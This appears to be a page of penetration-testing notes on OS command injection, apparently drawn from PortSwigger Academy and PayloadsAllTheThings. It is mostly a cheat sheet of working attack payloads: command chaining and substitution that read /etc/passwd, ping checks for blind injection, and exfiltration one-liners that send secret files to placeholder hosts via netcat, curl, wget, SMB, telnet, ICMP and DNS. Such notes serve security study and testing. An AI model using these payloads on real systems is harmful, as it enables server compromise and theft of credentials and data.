OS injection

From PortSwigger Academy

Description

OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data. Very often, an attacker can leverage an OS command injection vulnerability to compromise other parts of the hosting infrastructure, exploiting trust relationships to pivot the attack to other systems within the organization.

Resources

LogoPayloadsAllTheThings/Command Injection at master · swisskyrepo/PayloadsAllTheThingsGitHub
LogoData Exfiltration via Blind OS Command Injection | Context Information Security USContext Information Security US

How to inject

  • Basic commands 

cat /etc/passwd

  • Chaining commands

original_cmd_by_server; ls
original_cmd_by_server && ls
original_cmd_by_server | ls
original_cmd_by_server || ls    Only if the first cmd fail

  • Inside a command

original_cmd_by_server `cat /etc/passwd`
original_cmd_by_server $(cat /etc/passwd)

Blind OS command injection

Confirm the injection

& ping –c 10 127.0.0.1 &

Data exfiltration

  • using netcat listener

#linux
nc –lp {port} < {file/to/extract}

#windows
type {file to extract}  | nc -L -p {port}

  • using cURL

#post to webserver
cat /path/to/file | curl –F “:data=@-“ http://<ip>:<port>/test.txt

#transfer to ftp
curl –T {path to file} ftp://xxx.xxx.xxx.xxx –user :{password}

  • using wget

wget –header=”EVIL:$(cat /data/secret/password.txt)”http://<ip>:<port>
wget –post-data exfil=`cat /data/secret/secretcode.txt` http://<ip>:<port>
wget –post-file trophy.php http://<ip>:<port>

  • using SMB

#on Windows
net use h: \\<ip>\web /user: {password} && copy {File to Copy} h:\{filename}.txt

  • using telnet

telnet <ip> {port} < {file to transfer}

  • using icmp

#on Linux
cat password.txt | xxd -p -c 16 | while read exfil; do ping -p $exfil -c 1 xxx.xxx.xxx.xxx; done

#In Wireshark we can observe the packets containing our data.  You could write a script which scrapes the packets and re-assembles the file on the host

  • using DNS

cat /data/secret/password.txt | xxd -p -c 16 | while read exfil; do host $exfil.contextis.com 192.168.107.135; done

#In Wireshark we can observe the packets containing our data.  You could write a script which scrapes the packets and re-assembles the file on the host
PreviousAuthenticationNextCSRF

Last updated

Was this helpful?